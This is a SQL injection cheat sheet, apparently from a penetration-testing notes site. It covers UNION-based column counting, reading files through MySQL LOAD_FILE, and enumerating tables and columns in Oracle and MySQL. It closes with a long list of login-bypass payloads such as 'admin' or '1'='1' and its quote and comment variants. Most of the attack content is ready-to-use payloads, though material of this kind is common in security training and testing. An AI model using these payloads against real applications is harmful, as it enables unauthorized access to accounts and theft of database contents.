SQLi

UNION Injection

UNION allows you to combine two search queries together. Once you find the injection point, you can use UNION to craft another query to get the information you are looking for.

When crafting a UNION query, you need to include the same amount of columns as there are in the original query. You can use ORDER By to help figure that. You can also create the query with NULL for each column. The other tricky part is that the data type for each column must be the same in both queries. You cannot had a number and string in the same column.

Getting Amount of Columns with ORDER BY

ORDER BY 1
ORDER BY 2
ORDER BY 3
ORDER BY 4
...

Continue this pattern until you get an error which would suggest the last successful ORDER BY number is the amount of columns.

Getting the Amount of Columns with UNION

UNION SELECT NULL
UNION SELECT NULL,NULL
UNION SELECT NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL
...

Continue this pattern until you no longer get an error. Count the NULL and that is how many columns are in the original query.

MySQL

Using MySQL to look at files

SELECT LOAD_FILE('<path to file>')

group_concat()

group_concat() gets the specified column from multiple returned rows and puts into one string separated

UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

https://www.w3resource.com/mysql/aggregate-functions-and-grouping/aggregate-functions-and-grouping-group_concat.php https://www.mysqltutorial.org/mysql-group_concat/

Clauses

DISTINCT: Eliminates duplicate values ORDER BY: Sorts the values in either descending or ascending order. (Default is ascending order use DESC for descending.) SEPARATOR: Specify a character to use between each valued concatenated together. By default , is used.

Oracle

UNION

Oracle requires a FROM in UNIONs unlike MSSQL or MySQL.

UNION SELECT NULL from all_users

List Databases:

SELECT DISTINCT owner,NULL,NULL FROM all_tables

List Tables

Union select table_name,owner,NULL FROM all_tables ORDER BY 2

List Columns From Specific Table

Union select column_name,NULL,NULL FROM all_tab_columns WHERE table_name = '<TABLE NAME>'

List Columns and Table Names

Union select column_name,table_name,NULL FROM all_tab_columns Order BY 2

Get Data from Table

Union select <COLUMN>,<COLUMN>,NULL FROM <TABLE>

Authentication Bypass

`or 1=1  
or 1=1--  
or 1=1#  
or 1=1/*  
admin' --  
admin' #  
admin'/*  
admin' or '1'='1  
admin' or '1'='1'--  
admin' or '1'='1'#  
admin' or '1'='1'/*  
admin'or 1=1 or ''='  
admin' or 1=1  
admin' or 1=1--  
admin' or 1=1#  
admin' or 1=1/*  
admin') or ('1'='1  
admin') or ('1'='1'--  
admin') or ('1'='1'#  
admin') or ('1'='1'/*  
admin') or '1'='1  
admin') or '1'='1'--  
admin') or '1'='1'#  
admin') or '1'='1'/*  
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055  
admin" --  
admin" #  
admin"/*  
admin" or "1"="1  
admin" or "1"="1"--  
admin" or "1"="1"#  
admin" or "1"="1"/*  
admin"or 1=1 or ""="  
admin" or 1=1  
admin" or 1=1--  
admin" or 1=1#  
admin" or 1=1/*  
admin") or ("1"="1  
admin") or ("1"="1"--  
admin") or ("1"="1"#  
admin") or ("1"="1"/*  
admin") or "1"="1  
admin") or "1"="1"--  
admin") or "1"="1"#  
admin") or "1"="1"/*  
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055`

Resources

Last updated 4 years ago

Was this helpful?

UNION Injection

Getting Amount of Columns with ORDER BY

Getting the Amount of Columns with UNION

MySQL

group_concat()

Clauses

Oracle

UNION

List Databases:

List Tables

List Columns From Specific Table

List Columns and Table Names

Get Data from Table

Authentication Bypass

Resources

General

Authentication Bypass

MSSQL

MYSQL

Oracle